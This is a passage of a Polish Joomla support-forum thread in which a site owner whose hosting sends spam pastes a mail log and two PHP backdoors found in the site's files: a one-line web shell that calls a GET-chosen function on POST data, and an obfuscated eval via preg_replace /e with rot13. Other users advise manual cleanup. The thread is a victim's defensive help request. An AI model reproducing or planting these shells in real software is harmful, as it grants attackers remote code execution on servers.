Skrypt rozsyłający spam jak go znaleźć?
Strona 1 z 2 12 OstatniOstatni
Wyniki 1 do 10 z 13

Temat: Skrypt rozsyłający spam jak go znaleźć?

  1. #1
    Bywalec
    Dołączył
    27-03-2008
    Wpisy
    192
    Punkty
    10

    Joomla! 3.6 Skrypt rozsyłający spam jak go znaleźć?

    Strona w AZ.pl, administrator zgłasza mi że moja strona rozsyła z jakiegoś skryptu rozsyła spam. Skrypt który podstawia losowy adres nadawcy w mojej domenie. Robi sobie losowe adresy w mojej domenie np "hilario@mojadomena.pl"
    Fragment loga:
    2017-02-20 11:53:25 [29165] H=(mata.com) [84.38.130.58]:40015 I=[46.242.145.22]:25 F=<info@apple.com> rejected RCPT <hilario@domena.pl>: SPF: 84.38.130.58 is not allowed to send mail from apple.com
    Jomla i dodatki aktualne.
    Skanowałem antywirusem dostępnym w cPanel ale nic nie znalazł.

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Wiarus mjmartino awatar
    Dołączył
    03-12-2007
    Skąd
    Będzin /k Katowic
    Wpisy
    2 751
    Punkty
    212

    Domyślny

    Ręczna robota trzeba przejrzeć trochę plików, ściągnij kopie i udanego polowania ;)
    Niema uniwersalnego rozwiązania w poszukiwaniach tego typu skryptów bo każdy jest inny.
    ================================
    Administracja Joomla, Nowości, Artykuły Pomocne Administratorom, Usługi
    >>> https://joomlaguru.pl <<<
    Szkoła Joomla Guru (Kursy Online)
    >>> https://szkola.joomlaguru.pl <<<
    ================================

  4. #3
    Bywalec
    Dołączył
    27-03-2008
    Wpisy
    192
    Punkty
    10

    Domyślny

    W katalogu images znalazłem coś takiego jak stat.php Nie wiem co to jest?

    wywalone /@palyga007

  5. #4
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 899
    Punkty
    229

    Domyślny

    jak masz życzenie to wystaw to w formie pliku z linkiem do pobrania, nie ma sensu ładować tego do posta
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...
    web-coder.pl

  6. #5
    Bywalec
    Dołączył
    27-03-2008
    Wpisy
    192
    Punkty
    10

    Domyślny

    W katalogu components\com_contact\views\category\ znalazłem plik com_contact_info.php a w nim:
    <?php ($_=@$_GET[c]).@$_($_POST["h644k7"])?>
    W czystej joomli go nie ma co to jest?

  7. #6
    Bywalec
    Dołączył
    27-03-2008
    Wpisy
    192
    Punkty
    10

    Domyślny

    Kolejny podejrzany plik który znalazłem to bin-67.php w katalogu: media/plg_qickicon_joomlaupdate
    a jego zawartość to:
    <?php if($_GET['test']){echo 'success';}else{($www= $_POST['bnw4w']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}

  8. #7
    Senior PeFik awatar
    Dołączył
    18-02-2007
    Skąd
    Miasto Stu Mostów
    Wpisy
    5 465
    Punkty
    241

    Domyślny

    Polecam przeczytać rozdział 6 >> http://helion.pl/view/3926o/jowozr.htm
    Współautor bloga o systemie Joomla! -> blog.elimu.pl < oraz kilku książek i artykułów o tym CMS.

  9. #8
    Bywalec
    Dołączył
    27-03-2008
    Wpisy
    192
    Punkty
    10

    Domyślny

    Z pewnością to zrobię ale zanim kupię książkę administrator zablokuje mi konto hostingowe.

  10. #9
    Wyga palyga007 awatar
    Dołączył
    24-03-2010
    Skąd
    Wieluń
    Wpisy
    3 899
    Punkty
    229

    Domyślny

    Jeśli nie wiesz jak to ogarnąć to najlepszym rozwiązaniem pozostaje Ci dział zleceń. Nikt przy użyciu szklanej kuli ci www nie wyczyści.
    ---------------------------------------------------------------------------------------------
    "Nie chowaj nienawiści po wieczne czasy, ty, który sam nie jesteś wieczny."
    Przyjmę ofertę pracy w Australii...
    web-coder.pl

  11. #10
    Senior Bazyl awatar
    Dołączył
    02-08-2008
    Skąd
    Skierniewice
    Wpisy
    7 693
    Punkty
    574

    Domyślny

    ...i zwróć uwagę, że zlikwidujesz skutek, a nie przyczynę...

Strona 1 z 2 12 OstatniOstatni

Podobne tematy

  1. Skrypt rozsyłający spam jak go znaleźć?
    przez hizel na forum Bezpieczeństwo
    Odpowiedzi: 1
    Ostatni post/autor: 21-02-2017, 00:46
  2. PHP/Kryptik.BC - strona rozsyła spam
    przez kamilmaszczyk na forum Bezpieczeństwo
    Odpowiedzi: 9
    Ostatni post/autor: 07-11-2016, 16:20
  3. Spam w szablonie joomla ? jak usunąć kod spamujący ?
    przez zaxxx na forum Szablony, formatowanie wyglądu
    Odpowiedzi: 6
    Ostatni post/autor: 06-08-2012, 14:59
  4. 1.0.15 rozsyła spam.
    przez stasio na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 1
    Ostatni post/autor: 10-04-2009, 23:48
  5. Joomla rozsyła spam? Blokada domeny
    przez FXweb na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 4
    Ostatni post/autor: 28-03-2008, 11:30

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •